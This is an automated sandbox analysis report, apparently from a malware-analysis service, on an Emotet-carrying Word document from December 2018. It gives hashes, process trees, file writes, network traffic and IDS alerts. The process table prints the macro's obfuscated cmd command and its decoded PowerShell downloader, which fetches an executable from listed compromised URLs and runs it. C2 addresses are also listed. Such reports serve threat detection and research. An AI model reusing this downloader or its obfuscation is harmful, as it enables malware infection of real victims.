File name: | 3MDMvf_bDiRwT_2R5RoJCmJ |
Full analysis: | https://app.any.run/tasks/7349f3d3-7a55-4d22-83d1-67624d572651 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 19:17:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 17:28:00 2018, Last Saved Time/Date: Tue Dec 18 17:28:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0 |
MD5: | 7D72FDAF73CC6FAF684D1A98B82A12E8 |
SHA1: | 1A6048F4FC12A920ED1867AF623B408F39089B5B |
SHA256: | B4CE02C00705126F8AE6071A41EA8AE6EADA62D3052A8D4E850A142BAACCFE64 |
SSDEEP: | 3072:g0nbUh0eeTswVj8GhDS0o9zTGOZD6EbzCdyyjNmXZI:XRoUOZDlbeyyj4XZI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 17:28:00 |
ModifyDate: | 2018:12:18 17:28:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 33 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 37 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3496 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3MDMvf_bDiRwT_2R5RoJCmJ.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2824 | c:\o7555563226081\t2569490548\D569888924\..\..\..\windows\system32\cmd.exe /c %pROgRAMData:~0,1%%PRoGrAmDAta:~9,2% /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CM%os:~-7,-6% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
768 | CmD /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CMd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3480 | C:\Windows\system32\cmd.exe /S /D /c" eCHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3576 | CMd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3984 | powershell $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2916 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | — | powershell.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3720 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | 488.exe | |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3296 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 488.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3824 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa |
PID | Process | Filename | Type | |
---|---|---|---|---|
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA905.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\473B877B.wmf | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AFE0A41.wmf | — | |
MD5:— | SHA256:— | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOS7PYW8MU8KFYO8P1RB.temp | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$DMvf_bDiRwT_2R5RoJCmJ.doc | pgc | |
MD5:C81A5B5ED0215F9F56154774D4AFF38B | SHA256:9DE184C1E6ECC4B053FF1403733CA005CAA6E33D2E61ED8948730B0C0057574F | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ba0c.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE2130E2.wmf | wmf | |
MD5:1902BD1D0EE1D11C4CB92A8F96D6CDD7 | SHA256:577E19431A68CA3B4CBB0847822583285AEED4926C464E2ACAA44402317F37AD | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9103E340.wmf | wmf | |
MD5:D36786E54DFD5D7DA2F0B2DAC4F23407 | SHA256:E7D7FC6DC91230F6891F180C85C3649B5E8A4E7F274CDBADB8F50B3EE781C808 | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:6B4C003919922D3150FBE69ED05CA2BE | SHA256:6BFE33061E0B5ECA522C7484AE73A63509061FFF9A26239C67806D92C50013FB |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3824 | archivesymbol.exe | GET | — | 217.173.64.242:443 | http://217.173.64.242:443/ | RU | — | — | suspicious |
3984 | powershell.exe | GET | 200 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0/ | DE | executable | 124 Kb | suspicious |
3984 | powershell.exe | GET | 301 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0 | DE | html | 260 b | suspicious |
3824 | archivesymbol.exe | GET | 200 | 181.48.61.138:20 | http://181.48.61.138:20/ | CO | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3824 | archivesymbol.exe | 217.173.64.242:443 | — | OOO WestCall Ltd. | RU | suspicious |
3824 | archivesymbol.exe | 181.48.61.138:20 | — | Telmex Colombia S.A. | CO | malicious |
3984 | powershell.exe | 85.93.24.120:80 | www.hochwertige-markise.com | GHOSTnet GmbH | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
www.hochwertige-markise.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3984 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3984 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3984 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3824 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3824 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3824 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3824 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |